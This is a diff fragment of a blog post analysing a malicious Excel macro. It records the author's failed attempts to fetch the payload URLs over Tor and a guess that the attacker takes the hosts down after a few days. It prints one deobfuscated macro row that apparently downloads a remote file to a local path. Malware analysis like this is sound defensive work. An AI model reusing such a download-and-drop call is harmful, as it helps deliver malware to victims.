sameer/purisa.me/content/blog/excel_macro_analysis/index.md

 |sheet1|AO276|HERTY(0,"http://44276.7967810764.dat","..\Kiod.hod4",0,0)|

 Only the first three are valid URLs.
-I tried downloading the files through [Tor](https://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) out of curiosity but only got error codes.
+I tried downloading the files through [Tor](https://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) but didn't have any luck.
 The first and third returned 403: Forbidden.
 The second refused connections.

-I'm thinking this is some kind of timed attack that cuts off a few days of sending the email.
+This must be some kind of timed attack that cuts off a few days of sending the email.
-That way, the attacker can hit some victims but avoid detection by malware analyzers.
+That way, the attacker can hit some victims but avoid proper detection by malware analyzers.

 #### Deobfuscation